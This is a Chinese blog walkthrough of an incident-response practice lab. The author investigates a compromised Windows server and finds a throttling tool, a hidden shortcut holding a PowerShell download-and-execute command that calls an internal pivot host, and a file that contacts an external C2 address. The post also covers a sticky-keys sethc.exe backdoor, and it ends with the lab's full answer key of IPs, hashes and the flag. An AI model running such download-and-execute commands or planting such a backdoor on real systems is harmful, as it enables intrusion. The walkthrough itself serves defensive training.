欢迎光临
我们一直在努力

应急响应——(知攻善防)近源OS应急溯源靶场(详细教程解析)

也是好久没有写应急响应的文章了,差不多一个多月了吧;所以今天给大家恢复一下记忆;

  • 本靶场来自于知攻善防实验室出品的近源OS靶场,旨在帮助大家提升技能,熟练应对真实生活中的攻击以及意外;

文章目录

    • 靶机介绍
      • 环境搭建
    • 溯源过程
      • 进程排查
      • 目录文件排查
        • 排查本机文件
      • 新知识:怎么得到一个程序的md5值?
        • 方法:使用 Windows 自带 certutil(推荐,无需额外安装)
        • 排查Web应用
      • 日志排查
      • 隐藏文件
      • 检测伪装文件
      • flag(看网上WP)
    • 解题
      • 总结

靶机介绍

免责声明

本文仅用于网络安全技术学习与实验交流,所有操作均在合法授权环境下进行。 严禁用于未授权渗透、恶意攻击等违法用途。如有侵权,请联系删除。


环境搭建

前景需要:小王从某安全大厂被优化掉后,来到了某私立小学当起了计算机老师。某一天上课的时候,发现鼠标在自己动弹,又发现除了某台电脑,其他电脑连不上网络。感觉肯定有学生捣乱,于是开启了应急。

需要解决的问题:

  • 攻击者的外网IP地址
  • 攻击者的内网跳板IP地址
  • 攻击者使用的限速软件的md5大写
  • 攻击者的后门md5大写
  • 攻击者留下的flag
  • 账户密码:Administrator / zgsf@2024

    这里为了仿照现实中的事件,我并不会按照题目的顺序去解题,而是根据我自己的习惯去排查以及分析;如有不足,敬请指正;


    溯源过程

    我们打开靶机,可以看到是一台Windows Server2008的服务器:

    在这里插入图片描述

    进程排查

    既然是连不上网络,那么我们可以先进行进程的排查:

    输入命令:netstat -ano 没有发现可疑的外连地址

    在这里插入图片描述

    任务管理器也没有发现异常;

    目录文件排查

    排查本机文件

    既然“鼠标能够自己移动”,那肯定是存在某个异常的可执行文件上传到了电脑,才会导致这种结果;

    所以我们可以先排查用户的目录 / 文件 是否存在异常:

    在这里插入图片描述

    作用:这是 FileZilla Portable,它是一款便携式 FTP 客户端软件,主要用于在本地计算机和远程服务器之间进行文件传输。

    有没有可能这是学生留下的?保持疑问;

    继续排查:

    在C:\\PerfLogs\\666\\666\\777\\666\\666\\666\\666\\666\\666\\666\\666\\666\\666\\666发现了可疑程序:

    在这里插入图片描述

    网上搜查后发现:p2pover4.34.exe 是经典局域网管理工具 「P2P 终结者」 的 v4.34 版本主程序,属于 Windows 平台的局域网带宽管控软件,绿色免安装,体积小巧。

    所以这个应该就是控制网速的软件;

    新知识:怎么得到一个程序的md5值?

    方法:使用 Windows 自带 certutil(推荐,无需额外安装)

    打开命令提示符:按 Win + R 输入 cmd 回车。 执行计算命令:复制以下命令,替换 程序名.exe 为实际文件名,直接运行:

    certutil -hashfile "C:\\PerfLogs\\666\\666\\777\\666\\666\\666\\666\\666\\666\\666\\666\\666\\666\\666\\程序名.exe" MD5

    # 针对特定程序
    certutil -hashfile "C:\\PerfLogs\\666\\666\\777\\666\\666\\666\\666\\666\\666\\666\\666\\666\\666\\666\\p2pover4.34.exe" MD5

    结果如下: 在这里插入图片描述 MD5值为:2a5d8838bdb4d404ec632318c94adc96


    排查Web应用

    随后查看PHPstudy的日志:

    在这里插入图片描述 在这里插入图片描述

    经过排查,也并没有发现可疑文件;

    但是用D盾 时,发现开启了共享服务,应该就是通过SMB等服务上传了文件:

    在这里插入图片描述

    输入命令net share 发现确实开启着 $IPC共享文件服务:

    在这里插入图片描述


    日志排查

    接下来那就是系统日志:

    这里排查到RDP远程桌面的时候,发现了一点线索:

    在这里插入图片描述

    192.168.20.0/24 这个应该就是内网的网段;

    隐藏文件

    这里我们使用命令去检查主机上所有盘的隐藏文件:

    CMD 查看隐藏文件:

    # 查看当前目录下的隐藏文件/文件夹
    dir /a:h
    # 查看 C 盘所有隐藏文件(含子目录)
    dir /a:h /s C:\\
    # 只看隐藏文件(不含文件夹)
    dir /a:-d /a:h
    # 简洁列表(只显示名称)
    dir /a:h /b

    图形化操作:

  • 打开文件资源管理器,点击左上角 组织 → 文件夹和搜索选项。
  • 切换到 查看 选项卡。
  • 在“高级设置”中:
    • 勾选 显示隐藏的文件、文件夹和驱动器。
    • (可选)取消勾选 隐藏受保护的操作系统文件(推荐)。
  • 点击 应用 → 确定。

  • 确实在C:\\Users\\Administrator\\Desktop\\lnk发现了文件:

    在这里插入图片描述

    内容如下:

    powershell.exe -nop -w hidden -c "IEX ((newobject net.webclient).downloadstring('http://192.168.20.129:801/a'))"

    在这里插入图片描述

    所以内网跳板地址为:192.168.20.129

    检测伪装文件

    这里看到桌面有这么多文件,可疑检查一下是否有恶意文件:

    在这里插入图片描述

    而我的电脑立马就弹出了警告:

    在这里插入图片描述

    丢进云沙箱里分析:

    在这里插入图片描述 在这里插入图片描述

    可以看到当点击这个恶意文件时,就会从 http://8.219.200.130/hhW5 上执行程序,从而上线到对方的C2服务器;

    flag(看网上WP)

    这个我是真没想到:

    还有个一个后门就是shift后门,按5下shift就可以弹出cmd窗口,哪怕在锁屏的情况下也可以;

    • 原因是原本的文件被替换了

    在这里插入图片描述 在这里插入图片描述

    可以得到flag值为:flag{zgsf@shift666}

    certutil -hashfile "C:\\Windows\\System32\\sethc.exe" MD5

    在这里插入图片描述

    相应的hash值为:58a3ff82a1aff927809c529eb1385da1

    解题

    打开程序:

    在这里插入图片描述

    C:\\Users\\Administrator\\Desktop>解题工具.exe
    欢迎使用 知攻善防实验室-解题系统(公众号:知攻善防实验室)
    欢迎使用 知攻善防实验室-解题系统(公众号:知攻善防实验室)
    欢迎使用 知攻善防实验室-解题系统(公众号:知攻善防实验室)
    欢迎使用 知攻善防实验室-解题系统(公众号:知攻善防实验室)
    在此之前,你应该获得以下信息:
    1.攻击者的外网IP地址
    2.攻击者的内网跳板IP地址
    3.攻击者使用的限速软件的md5大写
    4.攻击者的后门md5大写
    5.攻击者留下的flag
    你准备好了吗?(y/n):y
    请输入攻击者的外网IP地址:8.219.200.130
    正确!
    请输入攻击者的内网跳板IP地址:192.168.20.129
    正确!
    请输入攻击者使用的限速软件的md5小写:2A5D8838BDB4D404EC632318C94ADC96
    正确!
    请输入攻击者的后门md5小写:58A3FF82A1AFF927809C529EB1385DA1
    正确
    请输入攻击者留下的flag:flag{zgsf@shift666}
    flag正确!!
    恭喜您,您已攻克此靶机!
    恭喜您,您已攻克此靶机!
    恭喜您,您已攻克此靶机!
    恭喜您,您已攻克此靶机!
    恭喜您,您已攻克此靶机!
    恭喜您,您已攻克此靶机!
    请按任意键继续. . .

    总结

    这次应急响应有很多是我第一次遇到的技术:

    • 获取程序的hash值
    • 隐藏文件查找
    • 伪装文件丢给杀软检测
    • 五次粘滞键shifit

    期待下次再见;

    赞(0)
    未经允许不得转载:171主机测评 » 应急响应——(知攻善防)近源OS应急溯源靶场(详细教程解析)
    分享到: 更多 (0)

    评论 抢沙发

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址